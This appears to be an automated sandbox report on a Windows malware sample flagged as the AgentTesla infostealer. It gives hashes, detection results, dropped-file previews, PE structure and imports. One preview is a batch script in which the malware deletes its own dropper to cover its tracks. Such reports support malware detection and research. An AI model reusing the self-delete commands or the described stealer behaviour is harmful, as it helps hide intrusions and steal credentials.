                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):250368
                                                                                                                Entropy (8bit):5.008874766930935
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                                                MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                                                SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                                                SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................
                                                                                                                Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):231936
                                                                                                                Entropy (8bit):5.039764014369673
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):164
                                                                                                                Entropy (8bit):4.966210631858107
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRIN2BQty:hWKdbuoL923fJWAawDNe923fT/
                                                                                                                MD5:39E753C87561C46E44E9798D3E4BCEEF
                                                                                                                SHA1:8B0401FA48A3E0E73EE65F84BDA99A59C17A710D
                                                                                                                SHA-256:0B017EB66D379DE60B3118CE72BA3AB4486A3AFD3A330E64E9600F5E6C1AE743
                                                                                                                SHA-512:7204572F6090551C75C7A10516BF8120779B300201CBBCA036D0908F88F138C6BF761D9E235CA7DDB7FBAC644AB948285EA2DEFB7AE2146EE71793BA4704833F
                                                                                                                Malicious:false
                                                                                                                Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpBC1D.tmp.cmd" /f /q..
                                                                                                                Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12320
                                                                                                                Entropy (8bit):7.984103135097405
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CBUHcuAnZ/dLAf61Fxmux3rldRPYmyzbPkIXjydjsLds2FdGqi0:CWMnUSDh3hdRwmyHPkyyFs+0
                                                                                                                MD5:49E2109376AFDD58252C8021871C153C
                                                                                                                SHA1:2F260DE09CD67D6B3A010294CB6CFE07EC3B1491
                                                                                                                SHA-256:659A6E56D3610D607C7380CE2114A56C2776BD3AA7BBB7BE97B9B06AB02199C9
                                                                                                                SHA-512:EFE35896D79AFDF8934A8B1121660F683712B2FD7724C7A805532F6AAA1C66E5FF6EDE89FC434D12FEFFA873C84371C367524F96D767A6F19DE3D8D04E284D61
                                                                                                                Malicious:false
                                                                                                                Preview:.....m:......`...2'@...q:.|`n@......~f.V...W!.....ml...Y..(..M.;V.......3......(I..].?...O..\5.GPA<.....J.d1.,WL.}..c......L8.]..ix*......O.Gm?6...Z..e.f@..*......x:0.7.!...*.$73~.W.`.R....v~T*......t[..;.Z..Y..-.fc.J4..F..,.....B.=.#E.n.D......V..ZRL.}P...E.M....He0..,-}.r\..)'\:...k5..k.....}.n.T..n../.......U2v...P...o_&.....w..I.>.03...DO\.........=Caz.%...u&9.$.O..+\._8..px[.&j=.-......u...NCC...>..@..w;.:...F....~.."r..>.FD..k.U..;..J#.0.C@.g.LO,.#....`. [.s3.../..I....w.V...:...............j.6.............j...u.X..K?.h.}.....X...+.....x...(o..3...b..`..\.CD.JC.=R8o6...._|.p.....sE...)V>.._.[....b3.......n..1....j.@.t.M..s.......by.r.5....<.te....o..i.|..6..0....DE.{...t..I... .....A$....B..H...H...n6me....1~}!..L.#Y.@..n.T..[../YR.."...$..q......G..NK.H..dR.c..l...'..]c..eEl..11..I...Y.K`X..0l...a.m.Vt.`....K6.m.yLfS....7.8'.O.c...U.H.R~J9."'..9.x.....w...5...u..Z..~Xx...30Q..K<x.Uf`....O.{.Y..[.ivf....u..%.....y.....uu
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):231936
                                                                                                                Entropy (8bit):5.039764014369673
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 26 06:13:12 2024, mtime=Tue Nov 26 06:13:12 2024, atime=Tue Nov 26 06:13:09 2024, length=231936, window=
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1794
                                                                                                                Entropy (8bit):3.4928008911803565
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:8apHfJ8rZ069q45UAns4FSnplwO4ZTqlSkhJm:8apH2C6Y49s4+plwZTqlSk3
                                                                                                                MD5:7205215A927CC9407842ABBFA6CC5376
                                                                                                                SHA1:BC656F77B44267B0F034F7892E8DF512D8F1CBD6
                                                                                                                SHA-256:C927EE14357D502385D00667B3ACDB01928AB8AB0E720894BF58BF01397EF0E0
                                                                                                                SHA-512:31673DBCDA66E33BB885F6B5707FC633DC9D9D3FFF1F91B6E429FE8904DD49B3DF0F86269015862231F22D79E47A3F95C424D4E941C16FC6D6429903F92E3445
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ...2....?..K....?.......?............................:..DG..Yr?.D..U..k0.&...&...... M.........?......?......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlzY.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....zY.9..Roaming.@......DWSlzY.9....C......................E..R.o.a.m.i.n.g.....T.1.....zY.9..ACCApi..>......zY.9zY.9....).........................A.C.C.A.p.i.....l.2.....zY.9 .TROJAN~1.EXE..P......zY.9zY.9....*.....................s..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........,.pr.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):591
                                                                                                                Entropy (8bit):4.641908060391267
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:qKrxTzP1eSbZ7u0wxDDDDDDDDjCaY5eUaYAQUTB8NGNe:FrxTzdp7u0wQakJaBt8NR
                                                                                                                MD5:15A0C655F699EC7BB94CDC85CC8043F4
                                                                                                                SHA1:FC1027DC9E053288927A572190DC83B7E6603B68
                                                                                                                SHA-256:DB3133534FF1DAD257CEDD8123F49798EB5AF7CFA4F89E1D82812906306604C0
                                                                                                                SHA-512:ED8877B838BEC062F96A06B4E39A522A7085E14930C87107CC9BFF99992C2184A6743C4E64D924647CF8F4D3A0C17B34AFD8C26CDEE82C84FFA1433D7003C39E
                                                                                                                Malicious:false
                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\2jbMIxCFsK.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x154000 (1392640) (1 MB)....Total bytes written = 0x154000 (1392640) (1 MB).......Operation completed successfully in 0.109 seconds.....
                                                                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                Category:dropped
                                                                                                                Size (bytes):66
                                                                                                                Entropy (8bit):4.524640141725149
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                                MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                                SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                                SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                                SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                                Malicious:false
                                                                                                                Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.401846851033825
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                File name:2jbMIxCFsK.exe
                                                                                                                File size:1'392'640 bytes
                                                                                                                MD5:67dac6ae9ee770115db85cc71979dc41
                                                                                                                SHA1:a708539ebb312329f56f064a8491e4c6e1bd7ce8
                                                                                                                SHA256:054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
                                                                                                                SHA512:9ff88c70d4a2f7628a2f853d576b8e7d7ebf3409de13d56895a06eb2fdc827beef45ec982dbc69a9577ed78d27d44f5df2284cdf614ba4debadaf74cd07c204d
                                                                                                                SSDEEP:24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
                                                                                                                TLSH:4C558D3AD2418F35D73A25394D8A72ACC758DD741823674F12B0B8D6AB341BB9F5C28E
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                Icon Hash:474726342a2a1343
                                                                                                                Entrypoint:0x477804
                                                                                                                Entrypoint Section:.itext
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:1cf89bd16e37e0c37d1d880d9b260250
                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                add esp, FFFFFFF0h
                                                                                                                mov eax, 004767D4h
                                                                                                                call 00007FFA30D45011h
                                                                                                                mov eax, dword ptr [00483334h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FFA30D975F5h
                                                                                                                mov ecx, dword ptr [004834A8h]
                                                                                                                mov eax, dword ptr [00483334h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, dword ptr [00476450h]
                                                                                                                call 00007FFA30D975F5h
                                                                                                                mov eax, dword ptr [00483334h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FFA30D97669h
                                                                                                                call 00007FFA30D42FFCh
                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x880000x27e8.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x950000xc8200.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x8d0000x72f0.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x8c0000x18.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x887680x63c.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x75a1c0x75c00d57cde4170c25f5d08008796cad956c8False0.5248971602972399data6.547715469019442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .itext0x770000x84c0xa00573f43ad83f7618f70b0dca6f069a6d6False0.527734375data5.550394697894556IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .data0x780000xb4d40xb60017f94756d9f74a6af798866472818ed8False0.10323660714285714data5.955797407613151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .bss0x840000x36bc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata0x880000x27e80x2800d6d67b578a55c915bb419857427b5e40False0.32392578125data5.202280923464677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .tls0x8b0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rdata0x8c0000x180x2005dc775149b0a138379f8fa3a2dac85d4False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x8d0000x72f00x74002ddee8524b7582c38792a7625197880eFalse0.6354054418103449data6.67972265985048IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0x950000xc82000xc82007562e91cb3c1fee8858fd8a0b8df7f04False0.5916248633666459data7.476322451277447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_CURSOR0x95b400x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                RT_CURSOR0x95c740x134dataEnglishUnited States0.4642857142857143
                                                                                                                RT_CURSOR0x95da80x134dataEnglishUnited States0.4805194805194805
                                                                                                                RT_CURSOR0x95edc0x134dataEnglishUnited States0.38311688311688313
                                                                                                                RT_CURSOR0x960100x134dataEnglishUnited States0.36038961038961037
                                                                                                                RT_CURSOR0x961440x134dataEnglishUnited States0.4090909090909091
                                                                                                                RT_CURSOR0x962780x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                RT_BITMAP0x963ac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                RT_BITMAP0x9657c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                RT_BITMAP0x967600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                RT_BITMAP0x969300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                RT_BITMAP0x96b000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                RT_BITMAP0x96cd00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                RT_BITMAP0x96ea00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                RT_BITMAP0x970700x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                RT_BITMAP0x972400x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                RT_BITMAP0x974100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                RT_BITMAP0x975e00xb2f98Device independent bitmap graphic, 997 x 245 x 24, image size 733040EnglishUnited States0.6320824466633929
                                                                                                                RT_BITMAP0x14a5780xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                RT_ICON0x14a6600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4999 x 4999 px/m0.20560165975103734
                                                                                                                RT_DIALOG0x14cc080x52data0.7682926829268293
                                                                                                                RT_DIALOG0x14cc5c0x52data0.7560975609756098
                                                                                                                RT_STRING0x14ccb00xd0data0.6009615384615384
                                                                                                                RT_STRING0x14cd800x34cdata0.45023696682464454
                                                                                                                RT_STRING0x14d0cc0xdcdata0.6545454545454545
                                                                                                                RT_STRING0x14d1a80xd8data0.6574074074074074
                                                                                                                RT_STRING0x14d2800x108data0.6174242424242424
                                                                                                                RT_STRING0x14d3880x3e0data0.40725806451612906
                                                                                                                RT_STRING0x14d7680x3a4data0.38197424892703863
                                                                                                                RT_STRING0x14db0c0x370data0.4022727272727273
                                                                                                                RT_STRING0x14de7c0x3ccdata0.33539094650205764
                                                                                                                RT_STRING0x14e2480x214data0.49624060150375937
                                                                                                                RT_STRING0x14e45c0xccdata0.6274509803921569
                                                                                                                RT_STRING0x14e5280x194data0.5643564356435643
                                                                                                                RT_STRING0x14e6bc0x3c4data0.3288381742738589
                                                                                                                RT_STRING0x14ea800x338data0.42961165048543687
                                                                                                                RT_STRING0x14edb80x294data0.42424242424242425
                                                                                                                RT_RCDATA0x14f04c0x10data1.5
                                                                                                                RT_RCDATA0x14f05c0x308data0.6971649484536082
                                                                                                                RT_RCDATA0x14f3640x70acDelphi compiled form 'TAboutForm'0.39037581472749966
                                                                                                                RT_RCDATA0x1564100x6c63Delphi compiled form 'TOpenForm'0.3646159945219303
                                                                                                                RT_GROUP_CURSOR0x15d0740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x15d0880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x15d09c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x15d0b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x15d0c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x15d0d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x15d0ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_ICON0x15d1000x14data1.25
                                                                                                                DLLImport
                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
